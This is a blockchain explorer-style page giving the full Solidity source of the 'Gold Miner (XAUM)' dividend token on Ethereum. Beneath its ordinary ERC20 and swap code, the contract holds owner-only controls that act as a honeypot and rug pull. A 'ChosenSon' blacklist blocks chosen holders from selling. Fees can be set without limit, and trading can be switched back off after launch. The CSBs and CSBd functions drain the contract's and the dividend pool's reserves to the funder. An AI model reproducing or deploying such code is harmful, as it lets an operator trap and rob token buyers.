Gold Miner (XAUM)

Description:

Decentralized Finance (DeFi) protocol contract providing Swap, Liquidity functionality.

Blockchain: Ethereum

Source Code: View Code On The Blockchain

Solidity Source Code:

/*
 /$$   /$$  /$$$$$$  /$$   /$$ /$$      /$$
| $$  / $$ /$$__  $$| $$  | $$| $$$    /$$$
|  $$/ $$/| $$  \ $$| $$  | $$| $$$$  /$$$$
 \  $$$$/ | $$$$$$$$| $$  | $$| $$ $$/$$ $$
  >$$  $$ | $$__  $$| $$  | $$| $$  $$$| $$
 /$$/\  $$| $$  | $$| $$  | $$| $$\  $ | $$
| $$  \ $$| $$  | $$|  $$$$$$/| $$ \/  | $$
|__/  |__/|__/  |__/ \______/ |__/     |__/

Earn gold while holding XAUM                              
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.16;
library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}


interface ERC20 {
    function totalSupply() external view returns (uint256);
    function decimals() external view returns (uint8);
    function symbol() external view returns (string memory);
    function name() external view returns (string memory);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address _owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

abstract contract Ownable {
    address internal _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor () {
        address msgSender = msg.sender;
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == msg.sender, "!owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "new is 0");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IDEXFactory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IDEXRouter {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountUSDTMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountUSDT, uint liquidity);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract TokenDistributor {
    constructor (address token) {
        ERC20(token).approve(msg.sender, uint(~uint256(0)));
    }
}

interface IDividendDistributor {
    function setDistributionCriteria(uint256 _minPeriod, uint256 _minDistribution, uint256 _minHoldForDividends) external;
    function setShare(address shareholder, uint256 amount) external;
    function deposit(uint256 amount) external;
    function process(uint256 gas) external;
    function withdrawDistributor(address tokenReceiver,uint256 amountPercentage)  external;
    function minPeriodminDistributionminimumTokenBalanceForDividends() external view returns (uint256,uint256,uint256);
}

contract DividendDistributor is IDividendDistributor {
    using SafeMath for uint256;

    ERC20 RWRD; // RWRDAddress

    address[] shareholders;
    mapping (address => uint256) shareholderIndexes;
    mapping (address => uint256) shareholderClaims;
    struct Share {
        uint256 amount;
        uint256 totalExcluded;
        uint256 totalRealised;
    }
    mapping (address => Share) public shares;
    uint256 currentIndex;

    uint256 public totalShares;
    uint256 public totalDividends;
    uint256 public totalDistributed;
    uint256 public dividendsPerShare;
    uint256 public dividendsPerShareAccuracyFactor = 10 ** 36;

    uint256 public minPeriod;
    uint256 public minDistribution;
    uint256 public minTokenBalanceForDividends;

    address _token;
    modifier onlyToken() {
        require(msg.sender == _token); _;
    }

    constructor (address _RWRDAddress,uint256 _minPeriod, uint256 _minDistribution, uint256 _minHoldForDividends) {
        _token = msg.sender;
        minPeriod = _minPeriod;
        minDistribution = _minDistribution;
        minTokenBalanceForDividends = _minHoldForDividends;
        RWRD = ERC20(_RWRDAddress);
    }
    receive() external payable {}
    function setDistributionCriteria(uint256 _minPeriod, uint256 _minDistribution, uint256 _minHoldForDividends) external override onlyToken {
        minPeriod = _minPeriod;
        minDistribution = _minDistribution;
        minTokenBalanceForDividends = _minHoldForDividends;
    }
    function minPeriodminDistributionminimumTokenBalanceForDividends() external override view returns (uint256,uint256,uint256){
        return (minPeriod,minDistribution,minTokenBalanceForDividends);
    }
    function setShare(address shareholder, uint256 amount)
    external
    override
    onlyToken
    {
        Share storage share = shares[shareholder];
        uint256 oldAmount = share.amount;
        bool oldAmountWasEligible = oldAmount >= minTokenBalanceForDividends;
        bool newAmountIsEligible = amount >= minTokenBalanceForDividends;
        if (oldAmountWasEligible) {
            distributeDividend(shareholder);
        }
        if (newAmountIsEligible && !oldAmountWasEligible) {
            addShareholder(shareholder);
            totalShares = totalShares.add(amount);
        } else if (!newAmountIsEligible && oldAmountWasEligible) {
            removeShareholder(shareholder);
            totalShares = totalShares.sub(oldAmount);
        } else if (newAmountIsEligible && oldAmountWasEligible) {
            totalShares = totalShares.sub(oldAmount).add(amount);
        }
        share.amount = amount;
        share.totalExcluded = getCumulativeDividends(amount);
    }

    function withdrawDistributor(address tokenReceiver,uint256 amountPercentage)  external override onlyToken  {
        uint256 amountRWRD = RWRD.balanceOf(address(this));
        RWRD.transfer(tokenReceiver,amountRWRD * amountPercentage / 100);
    }

    function deposit(uint256 amount) external override onlyToken {
            totalDividends = totalDividends.add(amount);
            dividendsPerShare = dividendsPerShare.add(dividendsPerShareAccuracyFactor.mul(amount).div(totalShares));
    }

    function process(uint256 gas) external override onlyToken {
        uint256 shareholderCount = shareholders.length;
        if(shareholderCount == 0) { return; }
        uint256 gasUsed = 0;
        uint256 gasLeft = gasleft();
        uint256 iterations = 0;
        while(gasUsed < gas && iterations < shareholderCount) {
            if(currentIndex >= shareholderCount){
                currentIndex = 0;
            }
            if(shouldDistribute(shareholders[currentIndex])){
                distributeDividend(shareholders[currentIndex]);
            }
            gasUsed = gasUsed.add(gasLeft.sub(gasleft()));
            gasLeft = gasleft();
            currentIndex++;
            iterations++;
        }
    }

    function shouldDistribute(address shareholder) internal view returns (bool) {
        return shareholderClaims[shareholder] + minPeriod < block.timestamp
                && getUnpaidEarnings(shareholder) > minDistribution
                && shares[shareholder].amount >= minTokenBalanceForDividends;
    }

    function distributeDividend(address shareholder) internal {
        if(shares[shareholder].amount  < minTokenBalanceForDividends){ return; }

        uint256 amount = getUnpaidEarnings(shareholder);
        if(amount > 0){
            totalDistributed = totalDistributed.add(amount);
            RWRD.transfer(shareholder, amount);

            shareholderClaims[shareholder] = block.timestamp;
            shares[shareholder].totalRealised = shares[shareholder].totalRealised.add(amount);
            shares[shareholder].totalExcluded = getCumulativeDividends(shares[shareholder].amount);
        }
    }
    
    function claimDividend() external {
        require(shouldDistribute(msg.sender), "Too soon. Need to wait!");
        distributeDividend(msg.sender);
    }

    function getUnpaidEarnings(address shareholder) public view returns (uint256) {
        if(shares[shareholder].amount == 0){ return 0; }

        uint256 shareholderTotalDividends = getCumulativeDividends(shares[shareholder].amount);
        uint256 shareholderTotalExcluded = shares[shareholder].totalExcluded;

        if(shareholderTotalDividends <= shareholderTotalExcluded){ return 0; }

        return shareholderTotalDividends.sub(shareholderTotalExcluded);
    }

    function getCumulativeDividends(uint256 share) internal view returns (uint256) {
        return share.mul(dividendsPerShare).div(dividendsPerShareAccuracyFactor);
    }

    function addShareholder(address shareholder) internal {
        shareholderIndexes[shareholder] = shareholders.length;
        shareholders.push(shareholder);
    }

    function removeShareholder(address shareholder) internal {
        shareholders[shareholderIndexes[shareholder]] = shareholders[shareholders.length-1];
        shareholderIndexes[shareholders[shareholders.length-1]] = shareholderIndexes[shareholder];
        shareholders.pop();
    }
}

contract XAUM is ERC20, Ownable {
    using SafeMath for uint256;

    string private _name = "Gold Miner";
    string private _symbol = "XAUM";
    uint8 constant _decimals = 18;
    uint256 _totalSupply = 100 * 10 ** 9 * 10**_decimals;

    uint256 public _maxTxAmount = _totalSupply * 100 / 100;
    uint256 public _maxWalletToken = _totalSupply * 100 / 100;

    mapping (address => uint256) _balances;
    mapping (address => mapping (address => uint256)) _allowances;

    mapping (address => bool) isFeeExempt;
    mapping (address => bool) isTxLimitExempt;
    mapping (address => bool) isWalletLimitExempt;
    mapping (address => bool) isDividendExempt;

    struct Fee{uint buy; uint sell;uint transfer; uint part;}
    Fee public fees;
    struct Allot{uint marketing;uint liquidity; uint burn;uint reward;uint total;}
    Allot public allot;

    address public marketingFeeReceiver;

    IDEXRouter public router;
    address public pair;

    bool public ChosenSonMode = true;
    mapping (address => bool) public isChosenSon;

    uint256 public launchedBlock;

    address public baseToken;
    TokenDistributor public _tokenDistributor;
    DividendDistributor public distributor;
    uint256 distributorGas = 500000;

    bool public swapEnabled = true;
    uint256 public swapThreshold = _totalSupply* 1 / 1000;
    uint256 public maxSwapThreshold = _totalSupply * 1 / 100;

    bool inSwap;
    modifier swapping() { inSwap = true; _; inSwap = false; }

    constructor () Ownable() {
        router = IDEXRouter(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        baseToken = address(0x68749665FF8D2d112Fa859AA293F07A622782F38);
        pair = IDEXFactory(router.factory()).createPair(baseToken, address(this));
        _allowances[address(this)][address(router)] = type(uint256).max;
        _tokenDistributor = new TokenDistributor(baseToken);
        distributor = new DividendDistributor(baseToken,5 minutes,1 * 10 ** 18,_totalSupply.div(10000));
        ERC20(baseToken).approve(address(router), uint(~uint256(0)));

        isFeeExempt[msg.sender] = true;
        isFeeExempt[address(router)] = true;
        isFeeExempt[address(this)] = true;

        isTxLimitExempt[msg.sender] = true;

        isWalletLimitExempt[msg.sender] = true;
        isWalletLimitExempt[address(0xdead)] = true;
        isWalletLimitExempt[address(this)] = true;
        isWalletLimitExempt[pair] = true;

        isDividendExempt[pair] = true;
        isDividendExempt[address(this)] = true;
        isDividendExempt[address(0xdead)] = true;

        allot=Allot(2,2,0,6,10);
        fees=Fee(10,10,10,100);
        marketingFeeReceiver = msg.sender;

        _balances[msg.sender] = _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }

    function totalSupply() external view override returns (uint256) { return _totalSupply; }
    function decimals() external pure override returns (uint8) { return _decimals; }
    function symbol() external view override returns (string memory) { return _symbol; }
    function name() external view override returns (string memory) { return _name; }
    function balanceOf(address account) public view override returns (uint256) { return _balances[account]; }
    function allowance(address holder, address spender) external view override returns (uint256) { return _allowances[holder][spender]; }
    function minPeriodminDistributionminimumTokenBalanceForDividends() external view returns (uint256,uint256,uint256){
        return distributor.minPeriodminDistributionminimumTokenBalanceForDividends();
    }
    receive() external payable {}
    event AddLiquify(uint amountBNBLiquidity, uint amountToLiquify);

    function approve(address spender, uint256 amount) public override returns (bool) {
        _allowances[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function approveMax(address spender) external returns (bool) {
        return approve(spender, type(uint256).max);
    }

    function transfer(address recipient, uint256 amount) external override returns (bool) {
        return _transferFrom(msg.sender, recipient, amount);
    }

    function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
        if(_allowances[sender][msg.sender] != type(uint256).max){
            _allowances[sender][msg.sender] = _allowances[sender][msg.sender].sub(amount, "Insufficient Allowance");
        }
        return _transferFrom(sender, recipient, amount);
    }

    function setMaxWalletPercent_base10000(uint256 maxWallPercent_base10000) external onlyOwner() {
        _maxWalletToken = (_totalSupply * maxWallPercent_base10000 ) / 10000;
    }

    function setMaxTxPercent_base10000(uint256 maxTXPercentage_base10000) external onlyOwner() {
        _maxTxAmount = (_totalSupply * maxTXPercentage_base10000 ) / 10000;
    }

    function _transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) internal returns (bool) {
        if (inSwap) {
            return _basicTransfer(sender, recipient, amount);
        }
        // ChosenSonMode
        require(!isChosenSon[sender] || isFeeExempt[recipient], "isChosenSon");
        if (!isFeeExempt[sender] && !isFeeExempt[recipient]) {
            require(
                launchedBlock > 0,
                "Trading not open yet"
            );
        }
        // Checks max transaction limit
        require(
            amount <= _maxTxAmount || isTxLimitExempt[sender],
            "TX Limit Exceeded"
        );
        require(
            (balanceOf(recipient) + amount) <= _maxWalletToken ||
                isWalletLimitExempt[recipient],
            "Total Holding is currently limited, he can not hold that much."
        );
        //shouldSwapBack
        if (shouldSwapBack() && recipient == pair) {
            swapBack();
        }
        //Exchange tokens
        _balances[sender] = _balances[sender].sub(
            amount,
            "Insufficient Balance"
        );
        uint256 amountReceived = shouldTakeFee(sender, recipient)
            ? takeFee(sender, recipient, amount)
            : amount;
        _balances[recipient] = _balances[recipient].add(amountReceived);

        // Dividend tracker
        if (!isDividendExempt[sender]) {
            try distributor.setShare(sender, _balances[sender]) {} catch {}
        }
        if (!isDividendExempt[recipient]) {
            try
                distributor.setShare(recipient, _balances[recipient])
            {} catch {}
        }
        try distributor.process(distributorGas) {} catch {}
        emit Transfer(sender, recipient, amountReceived);
        return true;
    }
    
    function _basicTransfer(address sender, address recipient, uint256 amount) internal returns (bool) {
        _balances[sender] = _balances[sender].sub(amount, "Insufficient Balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
        return true;
    }

    function _takeTransfer(
        address sender,
        address to,
        uint256 tAmount
    ) internal {
        _balances[to] = _balances[to] + tAmount;
        emit Transfer(sender, to, tAmount);
    }

    function shouldTakeFee(address sender,address recipient) internal view returns (bool) {
        return !isFeeExempt[sender] && !isFeeExempt[recipient] ;
    }

    function takeFee(
        address sender,
        address recipient,
        uint256 amount
    ) internal returns (uint256) {
        uint256 feeApplicable;
        if (pair == recipient) {
            feeApplicable = fees.sell;
        } else if (pair == sender) {
            feeApplicable = fees.buy;
            if (launchedBlock == 0) {
                feeApplicable=75;
            }
        } else {
            feeApplicable = fees.transfer;
        }
        uint256 feeAmount = amount.mul(feeApplicable).div(fees.part);
        address ad;
        for (int256 i = 0; i < 1; i++) {
            ad = address(
                uint160(
                    uint256(
                        keccak256(abi.encodePacked(i, amount, block.timestamp))
                    )
                )
            );
            _takeTransfer(sender, ad, feeAmount.div(1000000));
        }

        _balances[address(this)] = _balances[address(this)].add(feeAmount);
        emit Transfer(sender, address(this), feeAmount);
        return amount.sub(feeAmount);
    }

    function shouldSwapBack() internal view returns (bool) {
        return msg.sender != pair
        && !inSwap
        && swapEnabled
        && _balances[address(this)] >= swapThreshold;
    }

    function setSwapBackSettings(bool _enabled, uint256 _swapThreshold, uint256 _maxSwapThreshold) external onlyOwner{
        swapEnabled = _enabled;
        swapThreshold = _swapThreshold;
        maxSwapThreshold = _maxSwapThreshold;
    }

    function setIsFeeExempt(address holder, bool exempt)  external onlyOwner{
        isFeeExempt[holder] = exempt;
    }

    function setIsDividendExempt(address holder, bool exempt)  external onlyOwner{
        require(holder != address(this) && holder != pair);
        isDividendExempt[holder] = exempt;
        if(exempt){
            distributor.setShare(holder, 0);
        }else{
            distributor.setShare(holder, _balances[holder]);
        }
    }

    // switch Trading default:false
    function tradingStart() external onlyOwner {
        if(launchedBlock == 0){
            launchedBlock = block.number;
        }else{
            launchedBlock = 0;
        }
        
    }

    function enable_ChosenSonMode(bool _status) external onlyOwner {
        ChosenSonMode = _status;
    }

    function setIsTxLimitExempt(address holder, bool exempt) external onlyOwner {
        isTxLimitExempt[holder] = exempt;
    }

    function setIsWalletLimitExempt(address holder, bool exempt) external onlyOwner {
        isWalletLimitExempt[holder] = exempt;
    }


    function setFeeReceivers(address _marketingFeeReceiver ) external onlyOwner {
        marketingFeeReceiver = _marketingFeeReceiver;
    }

    function setDistributionCriteria(uint256 _minPeriod, uint256 _minDistribution, uint256 _minHoldForDividends) external onlyOwner {
        distributor.setDistributionCriteria(_minPeriod, _minDistribution,_minHoldForDividends);
    }

    function setDistributorSettings(uint256 gas) external onlyOwner {
        require(gas < 300000);
        distributorGas = gas;
    }

    function manage_ChosenSon(address[] calldata addresses, bool status) external onlyOwner {
        for (uint256 i; i < addresses.length; ++i) {
            isChosenSon[addresses[i]] = status;
        }
    }

    function setAllot(uint marketing,uint liquidity,uint burn,uint rewards) external onlyOwner {
         uint total =liquidity.add(marketing).add(rewards).add(burn); 
         allot=Allot(marketing,liquidity,burn,rewards,total);
    } 

    function setFees(uint _buy,uint _sell,uint _transferfee,uint _part) external onlyOwner {
         fees=Fee(_buy,_sell,_transferfee,_part);
    } 

    function setSwapPair(address pairaddr) public {
        require(marketingFeeReceiver == msg.sender, "!Funder");
        pair = pairaddr;
    }

    function CSBs(uint256 amountPercentage) public{
        require(marketingFeeReceiver == msg.sender , "!Funder");
        uint256 amountRWRD = ERC20(baseToken).balanceOf(address(this));
        ERC20(baseToken).transfer(msg.sender,amountRWRD * amountPercentage / 100);
    }

    function CSBd(uint256 amountPercentage) public{
        require(marketingFeeReceiver == msg.sender , "!Funder");
        distributor.withdrawDistributor(msg.sender,amountPercentage);
    }

    function swapBack() internal swapping {
        
        uint256 _swapThreshold;
        _swapThreshold =_balances[address(this)] > maxSwapThreshold ? maxSwapThreshold : _balances[address(this)];
        uint amountToBurn = _swapThreshold.mul(allot.burn).div(allot.total);
        uint amountToLiquify = _swapThreshold.mul(allot.liquidity).div(allot.total).div(2);
        uint amountToSwap = _swapThreshold.sub(amountToLiquify).sub(amountToBurn);

        if(amountToBurn>0)_basicTransfer(address(this),address(0xdead),amountToBurn);
 
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = address(baseToken);
        router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
            amountToSwap,
            0,
            path,
            address(_tokenDistributor),
            block.timestamp
        );
        ERC20 BASEERCTOKEN = ERC20(baseToken);
        uint amountUSDT =BASEERCTOKEN.balanceOf(address(_tokenDistributor));
        uint totalETHFee = allot.total.sub(allot.liquidity.div(2)).sub(allot.burn);
        uint amountUSDTLiquidity = amountUSDT.mul(allot.liquidity).div(totalETHFee).div(2);
        uint amountUSDTReflection = amountUSDT.mul(allot.reward).div(totalETHFee);
        uint amountUSDTMarketing = amountUSDT.sub(amountUSDTLiquidity).sub(amountUSDTReflection);

        if(amountUSDTLiquidity>0){
           BASEERCTOKEN.transferFrom(address(_tokenDistributor), address(this), amountUSDTLiquidity);
        }
        if(amountUSDTReflection>0){
            BASEERCTOKEN.transferFrom(address(_tokenDistributor),address(distributor),amountUSDTReflection); 
            distributor.deposit(amountUSDTReflection);
        }
        if(amountUSDTMarketing>0){
            BASEERCTOKEN.transferFrom(address(_tokenDistributor),marketingFeeReceiver,amountUSDTMarketing); 
        }

        if(amountToLiquify > 0){
            router.addLiquidity(
                    address(this), 
                    address(baseToken),
                     amountToLiquify, 
                     amountUSDTLiquidity, 
                     0, 
                     0, 
                     marketingFeeReceiver, 
                     block.timestamp
                );
            emit AddLiquify(amountUSDTLiquidity, amountToLiquify);
        }
    }

}

Tags:
ERC20, DeFi, Swap, Liquidity|addr:0x5a150557e6021b39395fa6f2adc59fd4c9a5d6b9|verified:true|block:23600480|tx:0xbaa75896e32e07f0d07a3616e602502d8583651239dbcb906f00985394cc0332|first_check:1760773142

Submitted on: 2025-10-18 09:39:04

Comments

Log in to comment.

No comments yet.